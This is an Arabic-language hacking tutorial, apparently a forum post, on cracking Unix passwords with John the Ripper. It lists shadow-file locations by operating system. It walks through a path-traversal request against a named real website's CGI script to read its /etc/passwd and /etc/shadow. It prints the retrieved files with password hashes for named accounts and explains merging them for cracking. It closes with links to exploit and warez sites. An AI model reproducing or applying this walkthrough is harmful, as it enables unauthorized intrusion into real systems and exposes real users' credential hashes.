------------------------------------------------------------------------------------------------
وسوف تحفظ النتيجه في الملف john.pot الموجود في نفس الدايروكتري ، وعليك حذف هذا الملف إذا أردت البدء في عمليه كسر جديده ويمكنك تغيير إسمه أو نقله في مكان آخر بدل من حذفه إذا كنت ترى ذلك ...
هناك طريقه اخرى للكسر وهي تسمى بـ brute force أو بالعربي القوه العنيفه ، وهي لا تحتاج لملف wordlist ، هي تقوم بتجربه كل الحروف والأرقام والرموز مع بعض في خانتان و3خانات واربع وخمس ..الخ حتى تصيب كلمة المرور الصحيحه ، وأنا افضل ان تستخدم ملفات wordlist فذلك لن يأخذ معك في الا ثواني فقط لأن عمليه التجربه الموضحه في الرسم بالأعلى ذكرت بأنه سرعة تجربه الكلمات يتجاوز 5000 كلمة في الثانيه ، إذا لم تفلح ملفات wordlist حينها إذهب الى القوه العنيفه brute force
الأمر التالي يجعل john the ripper يستخدم طريقه brute force السابق ذكرها
john -i passwd
حيث passwd هو ملف كلمة المرور المراد كسره ، إذا قمت بتجربه هذه الطريقه إضغط إنتر أثناء عمل البرنامج لترى الى أين توصل ...
- ولو كان ملف كلمة المرور مضلل ، ماذا علي ان أعمل ؟
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
دائما سوف تواجه كلمة مرور مضلله ، لكن هناك طريقه تسمى Unshadow لحل هذه المشكله !!
إذا واجهت ملف مضلل عليك البحث عن ملف ثاني يسمى ملف الشادو (ملف الظل) shadow file
وهذا الملف يوجد في امكنه معينه وكل نظام تشغيل له مكان يوضع به هذا الملف ، اليك الجدول التالي :
Linux : /etc/shadow token = *
SunOS : /etc/shadow token = يأخذ أشكال متعدده اشهرها هو *
FreeBSD : /etc/master.passwd or /etc/shadow token = * والجديد هو x
IRIX : /etc/shadow token = x
AIX : /etc/security/passwd token = !
ConvexOS : /etc/shadow or /etc/shadpw token = *
token تعني الرمز الذي يوجد في الملف passwd ، وهذا يفيد في تسهيل المهمه ، يعني لو مثلا لقيت علامه ! بدل كلمه المرور فهذا يعني ان كلمة المرور مسجله في /etc/security/passwd ، لقد إستعنت بالجدول السابق ذكره ، مثال على ملف شادو (أكرر ملف شادو هو الملف الذي تخزن فيه كلمة المرور الصحيحه)
هذا ملف shadow
------------------------------------------------------------------------------------------------
root:EpGw4GekZ1B9U:11390:::::: bin:NP:6445:::::: sys:NP:6445::::::
adm:IyEDQ6VoRlLHM:10935:::::: #admin:9z8VMm6Ovcvsc:10935:::::: lp:NP:6445::::::
------------------------------------------------------------------------------------------------
نلاحظ ان كلمات السر موجوده
الخطوه الأخيره وهي دمج ملف الباسورد passwd file مع shadow passwd لنحصل على ملف متكامل ونقدمه الى برامج الكسر السابق ذكرها...
هذا ملف باسورد حصلنا عليه من
http://wilsonweb2.hwwilson.com/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/passwd------------------------------------------------------------------------------------------------
root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp Admin:/usr/lib/uucp: nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network Admin:/usr/net/nls: nobody:x:60001:60001:Nobody:/: noaccess:x:60002:60002:No Access User:/: nobody4:x:65534:65534:SunOS 4.x Nobody:/: www:x:102:1001::/web:/bin/csh mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu sid:x:103:10::/export/home/sid:/bin/ksh mirror:x:104:1::/home/mirror:/bin/sh admin:x:105:1::/home/admin:/bin/sh jerome:x:106:1::/home/jerome:/bin/sh erl:x:102:1::/home/erl:/bin/sh landmark:x:1000:1000::/web/landmark:/bin/ksh
------------------------------------------------------------------------------------------------
ومن الـ token الموضح واللي هو x نعرف من خلال الجدول السابق ذكره بأن كلمة المرور الصحيحه في الدليل /etc/shadow
إذن نتوجه بالمتصفح الى
http://wilsonweb2.hwwilson.com/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/shadowلنحصل على الملف
------------------------------------------------------------------------------------------------
root:XOT4AiUKMRcKQ:10643:::::: daemon:NP:6445:::::: bin:NP:6445:::::: sys:NP:6445:::::: adm:NP:6445:::::: lp:NP:6445:::::: smtp:NP:6445:::::: uucp:NP:6445:::::: nuucp:NP:6445:::::: listen:*LK*::::::: nobody:NP:6445:::::: noaccess:NP:6445:::::: nobody4:NP:6445:::::: www:WJctaI.8rcSe2:10507:::::: mirrors:gg9p.5kwGw1MY:10911:::::: sid:stXldZKnujFYo:10515:::::: mirror:iMPWwbrU.gB4k:10601:::::: admin:hDhB5YYKyWgQw:10976:::::: jerome:XDqnOl32tPoGo:10976:::::: erl:0jE9Xem4aJYeI:10982:::::: landmark:0jCgWu6vl8g0s:11185::::::
------------------------------------------------------------------------------------------------
نقوم بنسخ كلمات السر الموجوده فيه ولصقها مكان علامه x في ملف الباسورد ، وهكذا مع جميع الحسابات لنحصل على ملف لمة مرور كامل ومتكامل ونقدمه الى برامج الكسر
ملاحظه مهمه :-
عليك جعل كل حساب في سطر ، يعني تربتها لتتعرف عليها برامج الكسر ...
مواقع تستحق الزياره :-
أنا متواجد في منتديات الكواكب العربيه على العنوان التالي
www.kwakeb.netبريدي الإلكتروني
condor@phreaker.netأرشيف لثغرات
www.securiteam.com/exploits/archive.htmlأرشيف لثغرات
www.ussrback.comأرشيف ثغرات + الكثير
www.secureroot.comأرشيف ثغرات
www.rootshell.comأرشيف ثغرات
www.ussrback.comمواقع لثغرات
www.secureroot.com/category/exploitsدليل لمواقع الهاكينق
www.hitboss.com/Hackingمحرك بحث لا غني عنه
www.undergroundnews.com/resources/search/underground/search.aspWarez.com-Underground
www.warez.comHacking (ممتاز لمن يريد البدايه)
www.neworder.box.skSecurity Search Engine
www.bugs2k.cominsecure
www.insecure.org</XMP></BODY></HTML>
http://public.www.easynet.co.uk/cgi-bin/formmail/formmail.pl
الأحد فبراير 24, 2008 8:37 am